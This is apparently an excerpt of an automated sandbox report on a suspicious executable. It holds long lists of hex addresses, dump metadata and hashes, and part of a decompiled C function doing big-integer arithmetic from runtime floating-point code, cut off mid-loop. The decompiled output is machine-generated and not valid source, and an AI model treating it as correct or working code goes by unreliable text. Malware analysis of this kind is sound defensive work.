                                                0x0026324b
                                                0x0026324b
                                                0x00263251
                                                0x00263253
                                                0x00263259
                                                0x0026325c
                                                0x0026326a
                                                0x00263270
                                                0x00263270
                                                0x00263272
                                                0x00263275
                                                0x0026327b
                                                0x0026327b
                                                0x0026327d
                                                0x00000000
                                                0x00000000
                                                0x0026327f
                                                0x00263281
                                                0x00263287
                                                0x00263287
                                                0x00263283
                                                0x00263283
                                                0x00263283
                                                0x0026328c
                                                0x0026328e
                                                0x0026329b
                                                0x0026329b
                                                0x00263290
                                                0x00263296
                                                0x00263296
                                                0x002632b9
                                                0x002632c1
                                                0x002632c8
                                                0x002632cf
                                                0x002632d0
                                                0x002632d3
                                                0x002632d9
                                                0x002632df
                                                0x002632e2
                                                0x002632e4
                                                0x00000000
                                                0x002632e4
                                                0x00000000
                                                0x002632e2
                                                0x002632ec
                                                0x002632f2
                                                0x002632f2
                                                0x002632f8
                                                0x002632fa
                                                0x00263304
                                                0x00263306
                                                0x00263306
                                                0x00263306
                                                0x00263308
                                                0x0026330f
                                                0x00263314
                                                0x00263321
                                                0x00263316
                                                0x00263319
                                                0x00263319
                                                0x00263314
                                                0x0026323c
                                                0x00263354
                                                0x0026335f
                                                0x00263360
                                                0x00263361
                                                0x00263367
                                                0x0026336d
                                                0x00263373
                                                0x00263373
                                                0x00000000
                                                0x002631ac
                                                0x00000000
                                                0x00263192
                                                0x00263374
                                                0x0026337a
                                                0x00263381
                                                0x00263382
                                                0x00263383
                                                0x00263388
                                                0x00263388
                                                0x002637ec
                                                0x002637f6
                                                0x002637f7
                                                0x002637fd
                                                0x002637ff
                                                0x00263c68
                                                0x00263c6a
                                                0x00263c6c
                                                0x00263c72
                                                0x00263c74
                                                0x00263c7a
                                                0x00263c7c
                                                0x00263fce
                                                0x00263fce
                                                0x00263fd0
                                                0x00263fd6
                                                0x00263fdd
                                                0x00263fe3
                                                0x00263fe5
                                                0x00264083
                                                0x00264083
                                                0x00264085
                                                0x00264086
                                                0x0026408c
                                                0x00000000
                                                0x00263feb
                                                0x00263feb
                                                0x00263fee
                                                0x00263ff4
                                                0x00263ffa
                                                0x00263ffc
                                                0x00264002
                                                0x00264004
                                                0x00264004
                                                0x00264006
                                                0x00264006
                                                0x0026400f
                                                0x00264016
                                                0x0026401c
                                                0x0026401f
                                                0x00264020
                                                0x00264022
                                                0x00264022
                                                0x00264026
                                                0x00264028
                                                0x0026402a
                                                0x00264030
                                                0x00264033
                                                0x00000000
                                                0x00264035
                                                0x00264035
                                                0x0026403c
                                                0x0026403c
                                                0x00264033
                                                0x00264028
                                                0x00263ffc
                                                0x00263fee
                                                0x00263fe5
                                                0x00263c82
                                                0x00263c82
                                                0x00263c82
                                                0x00263c85
                                                0x00263c89
                                                0x00263c89
                                                0x00263c8a
                                                0x00263c9c
                                                0x00263ca9
                                                0x00263cb8
                                                0x00263ce2
                                                0x00263ce7
                                                0x00263ced
                                                0x00263cf0
                                                0x00263cf6
                                                0x00263cf9
                                                0x00263d92
                                                0x00263d99
                                                0x00263e17
                                                0x00263e1d
                                                0x00263e23
                                                0x00263e26
                                                0x00263e28
                                                0x00263eb1
                                                0x00263e2e
                                                0x00263e2e
                                                0x00263e34
                                                0x00263e34
                                                0x00263e3a
                                                0x00263e40
                                                0x00263e42
                                                0x00263e44
                                                0x00263e44
                                                0x00263e4a
                                                0x00263e50
                                                0x00263e52
                                                0x00263e5a
                                                0x00263e5a
                                                0x00263e60
                                                0x00263e62
                                                0x00263e64
                                                0x00263e6a
                                                0x00263e6c
                                                0x00263f83
                                                0x00263f85
                                                0x00263f8b
                                                0x00263f8b
                                                0x00263f8e
                                                0x00263f8f
                                                0x00000000
                                                0x00263e72
                                                0x00263e78
                                                0x00263e78
                                                0x00263e7a
                                                0x00263e80
                                                0x00263e83
                                                0x00263e8a
                                                0x00263e90
                                                0x00263e92
                                                0x00263eb9
                                                0x00263ebb
                                                0x00263ebd
                                                0x00263ebf
                                                0x00263ec5
                                                0x00263ecb
                                                0x00263f65
                                                0x00263f65
                                                0x00263f68
                                                0x00000000
                                                0x00263f6e
                                                0x00263f6e
                                                0x00263f74
                                                0x00000000
                                                0x00263f74
                                                0x00263ed1
                                                0x00263ed1
                                                0x00263ed1
                                                0x00263ed4
                                                0x00000000
                                                0x00000000
                                                0x00263ed6
                                                0x00263ed8
                                                0x00263eda
                                                0x00263ee3
                                                0x00263ee3
                                                0x00263ee5
                                                0x00263eeb
                                                0x00263eeb
                                                0x00263ef7
                                                0x00263f02
                                                0x00263f05
                                                0x00263f12
                                                0x00263f15
                                                0x00263f16
                                                0x00263f17
                                                0x00263f1d
                                                0x00263f1f
                                                0x00263f25
                                                0x00263f2b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00263f2d
                                                0x00263f2d
                                                0x00263f2d
                                                0x00263f2f
                                                0x00000000
                                                0x00000000
                                                0x00263f31
                                                0x00263f34
                                                0x00000000
                                                0x00263f3a
                                                0x00263f3a
                                                0x00263f3c
                                                0x00263f3e
                                                0x00263f3e
                                                0x00263f3e
                                                0x00263f46
                                                0x00263f49
                                                0x00263f49
                                                0x00263f4f
                                                0x00263f51
                                                0x00263f53
                                                0x00263f5a
                                                0x00263f60
                                                0x00263f62
                                                0x00000000
                                                0x00263f62
                                                0x00000000
                                                0x00263f34
                                                0x00000000
                                                0x00263f2d
                                                0x00000000
                                                0x00263ed1
                                                0x00263e94
                                                0x00263e94
                                                0x00263e96
                                                0x00263e9c
                                                0x00263ea3
                                                0x00263ea3
                                                0x00263ea6
                                                0x00263ea6
                                                0x00000000
                                                0x00263e96
                                                0x00000000
                                                0x00263f7a
                                                0x00263f7a
                                                0x00263f7b
                                                0x00263f7b
                                                0x00000000
                                                0x00263e80
                                                0x00263d9b
                                                0x00263d9b
                                                0x00263dad
                                                0x00263dbc
                                                0x00263dc1
                                                0x00263dc4
                                                0x00263dc6
                                                0x00000000
                                                0x00263dcc
                                                0x00263dcc
                                                0x00263dcf
                                                0x00000000
                                                0x00263dd5
                                                0x00263dd5
                                                0x00263ddc
                                                0x00000000
                                                0x00263de2
                                                0x00263de8
                                                0x00263dea
                                                0x00263df0
                                                0x00263df0
                                                0x00263df2
                                                0x00263df2
                                                0x00263df4
                                                0x00263dfd
                                                0x00263e04
                                                0x00263e07
                                                0x00263e08
                                                0x00263e0a
                                                0x00263e0a
                                                0x00000000
                                                0x00263e12
                                                0x00263ddc
                                                0x00263dcf
                                                0x00263dc6
                                                0x00263cff
                                                0x00263cff
                                                0x00263d05
                                                0x00263d07
                                                0x00263d23
                                                0x00263d26
                                                0x00000000
                                                0x00263d2c
                                                0x00263d2c
                                                0x00263d33
                                                0x00000000
                                                0x00263d39
                                                0x00263d3f
                                                0x00263d41
                                                0x00263d47
                                                0x00263d47
                                                0x00263d49
                                                0x00263d49
                                                0x00263d4b
                                                0x00263d54
                                                0x00263d5b
                                                0x00263d5e
                                                0x00263d5f
                                                0x00263d61
                                                0x00263d61
                                                0x00263d69
                                                0x00263d69
                                                0x00263d6b
                                                0x00000000
                                                0x00263d71
                                                0x00263d71
                                                0x00263d77
                                                0x00263d7a
                                                0x00264044
                                                0x00264047
                                                0x0026404d
                                                0x00264062
                                                0x00264067
                                                0x0026406a
                                                0x00263d80
                                                0x00263d80
                                                0x00263d87
                                                0x00000000
                                                0x00263d87
                                                0x00263d7a
                                                0x00263d6b
                                                0x00263d33
                                                0x00263d09
                                                0x00263d09
                                                0x00263d0b
                                                0x00263d11
                                                0x00263d17
                                                0x00263d18
                                                0x00263f95
                                                0x00263f95
                                                0x00263f9c
                                                0x00263f9d
                                                0x00263f9e
                                                0x00263fa3
                                                0x00263fa6
                                                0x00263fa6
                                                0x00263fa6
                                                0x00263d07
                                                0x00263fa8
                                                0x00263fa8
                                                0x00263faa
                                                0x00264071
                                                0x00264078
                                                0x0026407f
                                                0x00264092
                                                0x00264098
                                                0x00264099
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00263fb0
                                                0x00263fb6
                                                0x00263fb6
                                                0x00263fbc
                                                0x00263fbc
                                                0x00263fc8
                                                0x00000000
                                                0x00263fc8
                                                0x00263805
                                                0x00263805
                                                0x00263807
                                                0x0026380d
                                                0x0026380f
                                                0x00263815
                                                0x00263817
                                                0x00263b8e
                                                0x00263b8e
                                                0x00263b90
                                                0x00263b96
                                                0x00263b9d
                                                0x00263b9f
                                                0x00263bfe
                                                0x00263c01
                                                0x00263c07
                                                0x00263c0d
                                                0x00263c13
                                                0x00263c15
                                                0x00263c1b
                                                0x00263c1d
                                                0x00263c1d
                                                0x00263c1f
                                                0x00263c1f
                                                0x00263c21
                                                0x00263c2a
                                                0x00263c31
                                                0x00263c34
                                                0x00263c35
                                                0x00263c37
                                                0x00263c37
                                                0x00263c3f
                                                0x00263c41
                                                0x00263c47
                                                0x00263c4d
                                                0x00263c50
                                                0x00000000
                                                0x00263c56
                                                0x00263c56
                                                0x00263c5d
                                                0x00263c5d
                                                0x00263c50
                                                0x00263c41
                                                0x00263c15
                                                0x00263ba1
                                                0x00263ba1
                                                0x00263ba3
                                                0x00263ba9
                                                0x00263baf
                                                0x00000000
                                                0x00263baf
                                                0x00263b9f
                                                0x0026381d
                                                0x0026381d
                                                0x0026381d
                                                0x00263820
                                                0x00263824
                                                0x00263824
                                                0x00263825
                                                0x00263837
                                                0x00263844
                                                0x00263853
                                                0x0026387d
                                                0x00263882
                                                0x00263888
                                                0x0026388b
                                                0x00263891
                                                0x00263894
                                                0x00263910
                                                0x00263917
                                                0x002639db
                                                0x002639e1
                                                0x002639e7
                                                0x002639ea
                                                0x002639ec
                                                0x00263a75
                                                0x002639f2
                                                0x002639f2
                                                0x002639f8
                                                0x002639f8
                                                0x002639fe
                                                0x00263a04
                                                0x00263a06
                                                0x00263a08
                                                0x00263a08
                                                0x00263a0e
                                                0x00263a14
                                                0x00263a16
                                                0x00263a1e
                                                0x00263a1e
                                                0x00263a24
                                                0x00263a26
                                                0x00263a28
                                                0x00263a2e
                                                0x00263a30
                                                0x00263b47
                                                0x00263b49
                                                0x00263b4f
                                                0x00263b4f
                                                0x00000000
                                                0x00263a36
                                                0x00263a3c
                                                0x00263a3c
                                                0x00263a3e
                                                0x00263a44
                                                0x00263a47
                                                0x00263a4e
                                                0x00263a54
                                                0x00263a56
                                                0x00263a7d
                                                0x00263a7f
                                                0x00263a81
                                                0x00263a83
                                                0x00263a89
                                                0x00263a8f
                                                0x00263b29
                                                0x00263b29
                                                0x00263b2c
                                                0x00000000
                                                0x00263b32
                                                0x00263b32
                                                0x00263b38
                                                0x00000000
                                                0x00263b38
                                                0x00263a95
                                                0x00263a95
                                                0x00263a95
                                                0x00263a98
                                                0x00000000
                                                0x00000000
                                                0x00263a9a
                                                0x00263a9c
                                                0x00263a9e
                                                0x00263aa7
                                                0x00263aa7
                                                0x00263aa9
                                                0x00263aaf
                                                0x00263aaf
                                                0x00263abb
                                                0x00263ac6
                                                0x00263ac9
                                                0x00263ad6
                                                0x00263ad9
                                                0x00263ada
                                                0x00263adb
                                                0x00263ae1
                                                0x00263ae3
                                                0x00263ae9
                                                0x00263aef
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00263af1
                                                0x00263af1
                                                0x00263af1
                                                0x00263af3
                                                0x00000000
                                                0x00000000
                                                0x00263af5
                                                0x00263af8
                                                0x00263bb2
                                                0x00263bb2
                                                0x00263bb4
                                                0x00263bba
                                                0x00263bc0
                                                0x00263bc1
                                                0x00000000
                                                0x00263afe
                                                0x00263afe
                                                0x00263b00
                                                0x00263b02
                                                0x00263b02
                                                0x00263b02
                                                0x00263b0a
                                                0x00263b0d
                                                0x00263b0d
                                                0x00263b13
                                                0x00263b15
                                                0x00263b17
                                                0x00263b1e
                                                0x00263b24
                                                0x00263b26
                                                0x00000000
                                                0x00263b26
                                                0x00000000
                                                0x00263af8
                                                0x00000000
                                                0x00263af1
                                                0x00000000
                                                0x00263a95
                                                0x00263a58
                                                0x00263a58
                                                0x00263a5a
                                                0x00263a60
                                                0x00263a67
                                                0x00263a67
                                                0x00263a6a
                                                0x00263a6a
                                                0x00000000
                                                0x00263a5a
                                                0x00000000
                                                0x00263b3e
                                                0x00263b3e
                                                0x00263b3f
                                                0x00263b3f
                                                0x00000000
                                                0x00263a44
                                                0x0026391d
                                                0x0026391d
                                                0x0026392f
                                                0x0026393e
                                                0x00263943
                                                0x00263946
                                                0x00263948
                                                0x00263964
                                                0x00263967
                                                0x00000000
                                                0x0026396d
                                                0x0026396d
                                                0x00263974
                                                0x00000000
                                                0x0026397a
                                                0x00263980
                                                0x00263982
                                                0x00263988
                                                0x00263988
                                                0x0026398a
                                                0x0026398a
                                                0x0026398c
                                                0x00263995
                                                0x0026399c
                                                0x0026399f
                                                0x002639a0
                                                0x002639a2
                                                0x002639a2
                                                0x00000000
                                                0x0026398a
                                                0x00263974
                                                0x0026394a
                                                0x0026394c
                                                0x00263952
                                                0x00263958
                                                0x00263959
                                                0x00000000
                                                0x00263959
                                                0x00263948
                                                0x00263896
                                                0x00263896
                                                0x0026389c
                                                0x0026389e
                                                0x002638b3
                                                0x002638b6
                                                0x00000000
                                                0x002638bc
                                                0x002638bc
                                                0x002638c3
                                                0x00000000
                                                0x002638c9
                                                0x002638cf
                                                0x002638d1
                                                0x002638d7
                                                0x002638d7
                                                0x002638d9
                                                0x002638d9
                                                0x002638db
                                                0x002638e4
                                                0x002638eb
                                                0x002638ee
                                                0x002638ef
                                                0x002638f1
                                                0x002638f1
                                                0x002639aa
                                                0x002639aa
                                                0x002639ac
                                                0x00000000
                                                0x002639b2
                                                0x002639b2
                                                0x002639b8
                                                0x002639bb
                                                0x002638fe
                                                0x00263905
                                                0x00000000
                                                0x002639c1
                                                0x002639c3
                                                0x002639c9
                                                0x002639cf
                                                0x002639d0
                                                0x00263bc7
                                                0x00263bc7
                                                0x00263bce
                                                0x00263bcf
                                                0x00263bd0
                                                0x00263bd5
                                                0x00263bd8
                                                0x00263bd8
                                                0x002639bb
                                                0x002639ac
                                                0x002638c3
                                                0x002638a0
                                                0x002638a0
                                                0x002638a2
                                                0x002638a8
                                                0x00263b52
                                                0x00263b52
                                                0x00263b53
                                                0x00263b59
                                                0x00263b59
                                                0x00263b60
                                                0x00263b61
                                                0x00263b62
                                                0x00263b67
                                                0x00263b6a
                                                0x00263b6a
                                                0x00263b6a
                                                0x0026389e
                                                0x00263b6c
                                                0x00263b6c
                                                0x00263b6e
                                                0x00263bdc
                                                0x00263be3
                                                0x00263be3
                                                0x00263be3
                                                0x00263bea
                                                0x00263bec
                                                0x00263bf2
                                                0x00263bf3
                                                0x0026409f
                                                0x0026409f
                                                0x002640a0
                                                0x002640a1
                                                0x002640a6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00263b70
                                                0x00263b76
                                                0x00263b76
                                                0x00263b7c
                                                0x00263b7c
                                                0x00263b88
                                                0x00000000
                                                0x00263b88
                                                0x00263817
                                                0x002640a9
                                                0x002640a9
                                                0x002640af
                                                0x002640b1
                                                0x002640b7
                                                0x002640bd
                                                0x002640bf
                                                0x002640c1
                                                0x002640c3
                                                0x002640c3
                                                0x002640c5
                                                0x002640c5
                                                0x002640ce
                                                0x002640cf
                                                0x002640d3
                                                0x002640da
                                                0x002640dd
                                                0x002640de
                                                0x002640e0
                                                0x002640e0
                                                0x002640e4
                                                0x002640ea
                                                0x002640ec
                                                0x002640f2
                                                0x002640f4
                                                0x002640fa
                                                0x002640fd
                                                0x00264110
                                                0x00264113
                                                0x00264119
                                                0x0026412e
                                                0x00264133
                                                0x002640ff
                                                0x00264101
                                                0x00264108
                                                0x00264108
                                                0x002640fd
                                                0x00264136
                                                0x00264136
                                                0x00264146
                                                0x0026414f
                                                0x00264150
                                                0x00264152
                                                0x002641e9
                                                0x002641eb
                                                0x002641f6
                                                0x002641f6
                                                0x002641f8
                                                0x002641fb
                                                0x002641fd
                                                0x00000000
                                                0x002641ed
                                                0x002641f3
                                                0x002641f3
                                                0x00264158
                                                0x00264158
                                                0x0026415e
                                                0x00264161
                                                0x00264167
                                                0x0026416a
                                                0x00264170
                                                0x00264172
                                                0x00264178
                                                0x0026417a
                                                0x0026417c
                                                0x0026417c
                                                0x0026417e
                                                0x0026417e
                                                0x0026418b
                                                0x00264192
                                                0x00264195
                                                0x00264196
                                                0x00264198
                                                0x00264199
                                                0x00264199
                                                0x0026419d
                                                0x002641a3
                                                0x002641a5
                                                0x002641a7
                                                0x002641ad
                                                0x002641b0
                                                0x002641c4
                                                0x002641ca
                                                0x002641df
                                                0x002641e4
                                                0x002641b2
                                                0x002641b2
                                                0x002641b9
                                                0x002641b9
                                                0x002641b0
                                                0x002641a5
                                                0x00264203
                                                0x00264203
                                                0x00264203
                                                0x0026420f
                                                0x00264212
                                                0x00264218
                                                0x0026421a
                                                0x0026421c
                                                0x00264222
                                                0x00264224
                                                0x00264224
                                                0x00264224
                                                0x00264222
                                                0x00264229
                                                0x0026422a
                                                0x0026422c
                                                0x0026422e
                                                0x0026422e
                                                0x00264230
                                                0x00264236
                                                0x0026423c
                                                0x0026423e
                                                0x00264244
                                                0x00264244
                                                0x0026424a
                                                0x0026424c
                                                0x00000000
                                                0x00000000
                                                0x00264252
                                                0x00264254
                                                0x00264256
                                                0x00264256
                                                0x00264258
                                                0x00264258
                                                0x00264268
                                                0x0026426f
                                                0x00264272
                                                0x00264273
                                                0x00264275
                                                0x00264275
                                                0x00264279
                                                0x0026427f
                                                0x00264281
                                                0x00264283
                                                0x00264289
                                                0x0026428c
                                                0x0026429d
                                                0x002642a0
                                                0x002642a6
                                                0x002642bb
                                                0x002642c0
                                                0x0026428e
                                                0x0026428e
                                                0x00264295
                                                0x00264295
                                                0x0026428c
                                                0x002642d1
                                                0x002642e0
                                                0x002642e1
                                                0x002642e1
                                                0x002642e3
                                                0x002642e5
                                                0x002642e5
                                                0x002642eb
                                                0x002642ee
                                                0x002642f0
                                                0x002642f2
                                                0x002642f2
                                                0x002642f5
                                                0x002642f6
                                                0x002642f6
                                                0x002642fb
                                                0x002642fe
                                                0x00264302
                                                0x00264302
                                                0x00264303
                                                0x00264305
                                                0x0026430b
                                                0x00264311
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00264311
                                                0x00264244
                                                0x00264317
                                                0x00264317
                                                0x00000000
                                                0x00264317
                                                0x0026309c
                                                0x00263093
                                                0x0026308a
                                                0x00263041
                                                0x00263045
                                                0x0026304d
                                                0x00000000
                                                0x0026304f
                                                0x00263055
                                                0x0026305a
                                                0x00264336
                                                0x00264336
                                                0x00264339
                                                0x00264344
                                                0x0026436f
                                                0x00264370
                                                0x00264371
                                                0x00264372
                                                0x00264373
                                                0x00264374
                                                0x00264379
                                                0x0026437c
                                                0x0026437f
                                                0x00264382
                                                0x00264385
                                                0x00264394
                                                0x00264396
                                                0x002643bc
                                                0x002643c1
                                                0x002643c7
                                                0x00000000
                                                0x00264398
                                                0x00264398
                                                0x0026439e
                                                0x00000000
                                                0x002643a0
                                                0x002643b7
                                                0x002643b7
                                                0x002643bb
                                                0x002643bb
                                                0x0026439e
                                                0x00264387
                                                0x0026438c
                                                0x002643cc
                                                0x002643cc
                                                0x002643cf
                                                0x002643cf
                                                0x00264346
                                                0x00264346
                                                0x00264346
                                                0x0026434e
                                                0x00264350
                                                0x00264359
                                                0x0026435e
                                                0x0026436c
                                                0x0026436c
                                                0x00264344
                                                0x0026304d

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: __floor_pentium4
                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                • API String ID: 4168288129-2761157908
                                                • Opcode ID: 88c084a0d9d2255bfe0263fa43e69572a5d777ad31baff7767d8601d3275da34
                                                • Instruction ID: 99c643c1fa52d53515b2037976acd66f15b5bfba38effbe435f1ca537dd8c82b
                                                • Opcode Fuzzy Hash: 88c084a0d9d2255bfe0263fa43e69572a5d777ad31baff7767d8601d3275da34
                                                • Instruction Fuzzy Hash: 79C26C71E286298FDB25CE28DD407EAB7B5EB84305F1441EAD84DE7240E775AEE18F40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00262B30 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 90%
                                                			E00262B30(signed int* _a4, char _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t197;
				signed int _t198;
				intOrPtr _t200;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t219;
				intOrPtr _t225;
				void* _t228;
				signed int _t230;
				signed int _t243;
				signed int _t247;
				signed int _t250;
				void* _t253;
				signed int _t256;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t274;
				signed int* _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr _t282;
				void* _t286;
				signed char _t292;
				signed int _t295;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t318;
				signed int _t322;
				signed int* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				signed int _t342;
				signed int* _t344;
				signed int _t349;
				signed int _t351;
				void* _t355;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int* _t368;
				intOrPtr _t369;
				signed int* _t370;
				signed int* _t373;

				_t262 = _a4;
				_t197 =  *_t262;
				if(_t197 != 0) {
					_t2 =  &_a8; // 0x26414b
					_t328 =  *_t2;
					_t267 =  *_t328;
					__eflags = _t267;
					if(_t267 != 0) {
						_t3 = _t197 - 1; // -1
						_t349 = _t3;
						_t4 = _t267 - 1; // -1
						_t198 = _t4;
						_v16 = _t349;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t349;
							if(_t198 > _t349) {
								L23:
								__eflags = 0;
								return 0;
							} else {
								_t46 = _t198 + 1; // 0x0
								_t306 = _t349 - _t198;
								_v60 = _t46;
								_t269 = _t349;
								__eflags = _t349 - _t306;
								if(_t349 < _t306) {
									L21:
									_t306 = _t306 + 1;
									__eflags = _t306;
								} else {
									_t368 =  &(_t262[_t349 + 1]);
									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t368;
										if( *_t341 !=  *_t368) {
											break;
										}
										_t269 = _t269 - 1;
										_t341 = _t341 - 4;
										_t368 = _t368 - 4;
										__eflags = _t269 - _t306;
										if(_t269 >= _t306) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t52 =  &_a8; // 0x26414b
									_t369 =  *_t52;
									_t243 = _t269 - _t306;
									__eflags =  *((intOrPtr*)(_t369 + 4 + _t243 * 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
									if( *((intOrPtr*)(_t369 + 4 + _t243 * 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t306;
								if(__eflags != 0) {
									_t330 = _v60;
									_t60 =  &_a8; // 0x26414b
									_t200 =  *_t60;
									_t351 =  *(_t200 + _t330 * 4);
									_t201 =  *((intOrPtr*)(_t200 + _t330 * 4 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t351;
									if(__eflags == 0) {
										_t270 = 0x20;
									} else {
										_t270 = 0x1f - _t201;
									}
									_v40 = _t270;
									_v64 = 0x20 - _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										_t292 = _v40;
										_v36 = _v36 << _t292;
										_v56 = _t351 << _t292 | _v36 >> _v64;
										__eflags = _t330 - 2;
										if(_t330 > 2) {
											_t76 =  &_a8; // 0x26414b
											_t81 =  &_v36;
											 *_t81 = _v36 |  *( *_t76 + _t330 * 4 - 8) >> _v64;
											__eflags =  *_t81;
										}
									}
									_v76 = 0;
									_t307 = _t306 + 0xffffffff;
									__eflags = _t307;
									_v32 = _t307;
									if(_t307 < 0) {
										_t331 = 0;
										__eflags = 0;
									} else {
										_t85 =  &(_t262[1]); // 0x4
										_v20 =  &(_t85[_t307]);
										_t206 = _t307 + _t330;
										_t90 = _t262 - 4; // -4
										_v12 = _t206;
										_t278 = _t90 + _t206 * 4;
										_v80 = _t278;
										do {
											_t95 =  &_v16; // 0x26414b
											__eflags = _t206 -  *_t95;
											if(_t206 >  *_t95) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t278[2];
											}
											__eflags = _v40;
											_t311 = _t278[1];
											_t279 =  *_t278;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t279;
											if(_v40 > 0) {
												_t318 = _v8;
												_t336 = _t279 >> _v64;
												_t230 = E00267740(_t311, _v40, _t318);
												_t279 = _v40;
												_t207 = _t318;
												_t311 = _t336 | _t230;
												_t359 = _v24 << _t279;
												__eflags = _v12 - 3;
												_v8 = _t318;
												_v24 = _t359;
												if(_v12 >= 3) {
													_t279 = _v64;
													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
													__eflags = _t360;
													_t207 = _v8;
													_v24 = _t360;
												}
											}
											_t208 = E002674A0(_t311, _t207, _v56, 0);
											_v44 = _t262;
											_t263 = _t208;
											_v44 = 0;
											_t209 = _t311;
											_v8 = _t263;
											_v28 = _t209;
											_t333 = _t279;
											_v72 = _t263;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t264 = _t263 + 1;
												asm("adc eax, 0xffffffff");
												_t333 = _t333 + E00267540(_t264, _t209, _v56, 0);
												asm("adc esi, edx");
												_t263 = _t264 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t263;
												_v72 = _t263;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t263 - 0xffffffff;
												if(_t263 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t333 - 0xffffffff;
													if(_t333 <= 0xffffffff) {
														while(1) {
															L44:
															_v8 = _v24;
															_t228 = E00267540(_v36, 0, _t263, _t209);
															__eflags = _t311 - _t333;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t263 = _t263 + 0xffffffff;
																_v72 = _t263;
																asm("adc eax, 0xffffffff");
																_t333 = _t333 + _v56;
																__eflags = _t333;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t333 == 0) {
																	__eflags = _t333 - 0xffffffff;
																	if(_t333 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t228 - _v8;
																if(_t228 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
															L51:
															_v8 = _t263;
															goto L52;
														}
														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t280 = _v60;
												_t334 = 0;
												_t355 = 0;
												__eflags = _t280;
												if(_t280 != 0) {
													_t144 =  &_a8; // 0x26414b
													_t266 = _v20;
													_t219 =  *_t144 + 4;
													__eflags = _t219;
													_v24 = _t219;
													_v16 = _t280;
													do {
														_v44 =  *_t219;
														_t225 =  *_t266;
														_t286 = _t334 + _v72 * _v44;
														asm("adc esi, edx");
														_t334 = _t355;
														_t355 = 0;
														__eflags = _t225 - _t286;
														if(_t225 < _t286) {
															_t334 = _t334 + 1;
															asm("adc esi, esi");
														}
														 *_t266 = _t225 - _t286;
														_t266 = _t266 + 4;
														_t219 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t219;
													} while ( *_t164 != 0);
													_t263 = _v8;
													_t280 = _v60;
												}
												__eflags = 0 - _t355;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														__eflags = _t280;
														if(_t280 != 0) {
															_t170 =  &_a8; // 0x26414b
															_t338 = _t280;
															_t314 = _v20;
															_t362 =  *_t170 + 4;
															__eflags = _t362;
															_t265 = 0;
															do {
																_t282 =  *_t314;
																_t362 = _t362 + 4;
																_t314 = _t314 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
																asm("adc eax, 0x0");
																_t265 = 0;
																_t338 = _t338 - 1;
																__eflags = _t338;
